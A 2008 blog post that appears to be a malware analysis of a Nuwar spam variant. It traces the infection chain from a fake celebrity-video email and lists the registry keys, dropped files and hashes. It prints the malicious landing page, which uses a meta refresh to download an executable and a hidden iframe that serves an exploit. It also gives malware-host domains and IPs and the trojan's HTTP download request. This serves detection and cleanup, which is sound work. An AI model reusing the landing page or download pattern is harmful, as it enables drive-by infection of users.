Sunday, June 1, 2008

video_file.exe Nuwar Variant

Nuwar malware variants continue to propogate through spammed email attachments purporting to be erotic pictures and videos of various celebrities. The following discusses an example detected as Trojan.Erotpics (Symantec) and TROJ_NUWAR.ABK (Trend Micro).

Malicious Nuwar Email:

A spam email arrives appearing to include a link for a Jennifer Aniston video.


The "Download now" hyperlink links to http: //do-haguenau[dot]com/index1.php. The index1.php script returns a location redirect to http: //do-haguenau[dot]com/main34.html. The main34.html code contains a META tag that downloads video_film.exe in 5 seconds, a hyperlink for directly downloading video_film.exe, and an iframe for http: //do-haguenau[dot]com/pindex.php.

<html><head> <META HTTP-EQUIV="refresh" CONTENT="5;URL=http://do-haguenau[dot]com/video_film.exe"> <title></title></head>
<body&gt;<iframe src="http: //do-haguenau[dot]com/pindex.php" style="width:1px; height:1px;"></iframe><br>
<div style="text-align:center; padding-top:100px;"><img src="wamkl.gif"><br>Please Wait!<br&gt;<a href="http: //do-haguenau[dot]com/video_film.exe"&gt;Download Video</a>
</div></body></html>

The iframe for http: //do-haguenau[dot]com/pindex.php returns MDAC MS06-014 exploit code resulting in the request for http: //do-haguenau[dot]com//load.php which is downloaded as 1.exe.

Malware Analysis:

video_film.exe
The Nuware malware video_film.exe copies itself as C:\WINDOWS\System32\CbEvtSvc.exe.

The following registry keys are created:

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CbEvtSvc]
"DisplayName"=CbEvtSvc
"ErrorControl"=1
"ImagePath"=%SystemRoot%\System32\CbEvtSvc.exe -k netsvcs
"ObjectName"=LocalSystem
"Opt"
"Start"=2
"Type"=10

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CbEvtSvc\Enum]
"0"=Root\LEGACY_CBEVTSVC\0000
"Count"=1
"NextInstance"=1
"Security"=01, 00, 14, 80, 90, 00, 00, 00, 9C, 00, 00, 00, 14, 00, 00, 00, 30, 00, 00, 00, 02, 00, 1C, 00, 01, 00, 00, 00, 02, 80, 14, 00, FF, 01, 0F, 00, 01, 01, 00, 00, 00, 00, 00, 01, 00, 00, 00, 00, 02, 00, 60, 00, 04, 00, 00, 00, 00, 00, 14, 00, FD, 01, 02, 00, 01, 01, 00, 00, 00, 00, 00, 05, 12, 00, 00, 00, 00, 00, 18, 00, FF, 01, 0F, 00, 01, 02, 00, 00, 00, 00, 00, 05, 20, 00, 00, 00, 20, 02, 00, 00, 00, 00, 14, 00, 8D, 01, 02, 00, 01, 01, 00, 00, 00, 00, 00, 05, 0B, 00, 00, 00, 00, 00, 18, 00, FD, 01, 02, 00, 01, 02, 00, 00, 00, 00, 00, 05, 20, 00, 00, 00, 23, 02, 00, 00, 01, 01, 00, 00, 00, 00, 00, 05, 12, 00, 00, 00, 01, 01, 00, 00, 00, 00, 00, 05, 12, 00, 00, 00

The malware downloads 14instne.exe and ccbjq.exe from wbnet.com.br (66.7.212.241) and 1.exe from spiderfront.net (206.51.236.176).

14instne.exe
The malware is detected as Trojan.Srizbi (Symantec). The malware installs as a rootkit and generates spam. The malware 14instne.exe copies itself as C:\Documents and Settings\LocalService\Application Data\1107833316.exe. The malware 1107833316.exe creates the hidden file C:\WINDOWS\system32\drivers\qandr.sys.

The following registry keys are created:

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\qandr]
"Type"=dword:00000001
"Start"=dword:00000002
"ErrorControl"=dword:00000001
"ImagePath"=str(2):"\??\C:\WINDOWS\system32\drivers\qandr.sys"
"DisplayName"="qandr"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\qandr\Security]
"Security"=hex:01,00,14,80,90,00,00,00,9c,00,00,00,14,00,00,00,30,00,00,00,02,00,1c,00,01,00,00,00,02,80,14,00,ff,01,0f,00,01,01,00,00,00,00,00,01,00,00,00,00,02,00,60,00,04,00,00,00,00,00,14,00,fd,01,02,00,01,01,00,00,00,00,00,05,12,00,00,00,00,00,18,00,ff,01,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,00,00,14,00,8d,01,02,00,01,01,00,00,00,00,00,05,0b,00,00,00,00,00,18,00,fd,01,02,00,01,02,00,00,00,00,00,05,20,00,00,00,23,02,00,00,01,01,00,00,00,00,00,05,12,00,00,00,01,01,00,00,00,00,00,05,12,00,00,00

ccbjq.exe
The Nuware variant malware ccbjq.exe copies itself as C:\Documents and Settings\LocalService\Application Data\971313497.exe. The malware 971313497.exe copies itself as C:\WINDOWS\System32\CcEvtSvc.exe.

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CcEvtSvc]
"DisplayName"=CcEvtSvc
"ErrorControl"=1
"ImagePath"=%SystemRoot%\System32\CcEvtSvc.exe -k netsvcs
"ObjectName"=LocalSystem
"Opt"
"Start"=2
"Type"=10

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CcEvtSvc\Enum]
"0"=Root\LEGACY_CCEVTSVC\0000
"Count"=1
"NextInstance"=1
"Security"=01, 00, 14, 80, 90, 00, 00, 00, 9C, 00, 00, 00, 14, 00, 00, 00, 30, 00, 00, 00, 02, 00, 1C, 00, 01, 00, 00, 00, 02, 80, 14, 00, FF, 01, 0F, 00, 01, 01, 00, 00, 00, 00, 00, 01, 00, 00, 00, 00, 02, 00, 60, 00, 04, 00, 00, 00, 00, 00, 14, 00, FD, 01, 02, 00, 01, 01, 00, 00, 00, 00, 00, 05, 12, 00, 00, 00, 00, 00, 18, 00, FF, 01, 0F, 00, 01, 02, 00, 00, 00, 00, 00, 05, 20, 00, 00, 00, 20, 02, 00, 00, 00, 00, 14, 00, 8D, 01, 02, 00, 01, 01, 00, 00, 00, 00, 00, 05, 0B, 00, 00, 00, 00, 00, 18, 00, FD, 01, 02, 00, 01, 02, 00, 00, 00, 00, 00, 05, 20, 00, 00, 00, 23, 02, 00, 00, 01, 01, 00, 00, 00, 00, 00, 05, 12, 00, 00, 00, 01, 01, 00, 00, 00, 00, 00, 05, 12, 00, 00, 00

1.exe
The malware CbEvtSvc.exe downloads 1.exe from spiderfront.net (206.51.236.176). 1.exe is another Nuware variant (Trend Micro)

GET /l.php?id=144&dgfd=sfdsf HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727)
Host: spiderfront.net
Connection: Keep-Alive

HTTP/1.1 200 OK
Date: Sat, 31 May 2008 19:13:29 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Disposition: attachment; filename=1.exe
Connection: close
Content-Type: application/octet-stream

The malware 1.exe copies itself as C:\Documents and Settings\LocalService\Application Data\1307074916.exe. The malware 1307074916.exe creates the following files:

C:\WINDOWS\System32\sockins32.dll
C:\WINDOWS\System32\sft.res
C:\WINDOWS\index.html

The following registry keys are created:

[HKEY_CLASSES_ROOT\CLSID\{66186F05-BBBB-4a39-864F-72D84615C679}]
"(Default)"=WebProxy

[HKEY_CLASSES_ROOT\CLSID\{66186F05-BBBB-4a39-864F-72D84615C679}\InProcServer32]
"(Default)"=sockins32.dll"ThreadingModel"=Apartment

[HKEY_CLASSES_ROOT\CLSID\{FFFFFFFF-BBBB-4146-86FD-A722E8AB3489}]
"(Default)"=Microsoft copyright

[HKEY_CLASSES_ROOT\CLSID\{FFFFFFFF-BBBB-4146-86FD-A722E8AB3489}\InprocServer32]
"(Default)"=sockins32.dll
"ThreadingModel"=Apartment

[HKEY_CLASSES_ROOT\CLSID\{FFFFFFFF-BBBB-4146-86FD-A722E8AB3489}\ProgID]
"(Default)"=MS

[HKEY_CLASSES_ROOT\CLSID\{FFFFFFFF-BBBB-4146-86FD-A722E8AB3489}\TypeLib]
"(Default)"={0AB9CC99-BBBB-40cb-A718-9A2AF9026DFD}

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{66186F05-BBBB-4a39-864F-72D84615C679}]
"(Default)"=Systray component
"IsInstalled"=1
"Locale"=EN
"StubPath"=rundll32 sockins32.dll,InitModule
"Version"=1,0,0,2

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad]
"WebProxy"={66186F05-BBBB-4a39-864F-72D84615C679}

[HKEY_LOCAL_MACHINE\SOFTWARE\TSoft]
"Ad"=gde*> caftt}vc`~e!~t{?sfu>#?xa
"Ad2"=gde*> txhyene}up{x?f~w`?sfu>#?xa
"MainM"=XDH@BEX OGG
"NN"=m=88
"NUM"=lQQQQQQQQ:UUUU:#&#!:/!QS:V %%R/VU$#/.j

The following files were observed during malware analysis.

1.exe bfbdf69eb3b1c9311bd5bfe4e6da9233 106497
1107833316.exe c048fc3c849151071ddef5fb91e189c4 17203214
instne1.exe c048fc3c849151071ddef5fb91e189c4 172032
1.exe 8679dce8b2cdd441493bc73a8f08e971 92672
971313497.exe 1bdbf846973a29a39fc0e78d1e1597ed 115200
arpaqprq.tmp ac8ff8e2fd73b1fc534a58113eebdbf4 29
CbEvtSvc.exe 327476b3f320d220a71ca59f52725a1c 106496
ccbjq.exe 1bdbf846973a29a39fc0e78d1e1597ed 115200
CcEvtSvc.exe 1bdbf846973a29a39fc0e78d1e1597ed 115200
index.html ca2f1210f73456befb556a52ea1ae089 578
qandr 98f8b44240dd7793f1a8236a146395b4 130048
sft.res af87b7446983df37b85ac04c091824ce 7268
sockins32.dll 849c8247a5673359bfae683e106e277b 32768
video_film.exe 327476b3f320d220a71ca59f52725a1c 106496
_it.bat baa54369f859f810a2f2bd163abef3f0 272
Posted by at
Subscribe to: Posts (Atom)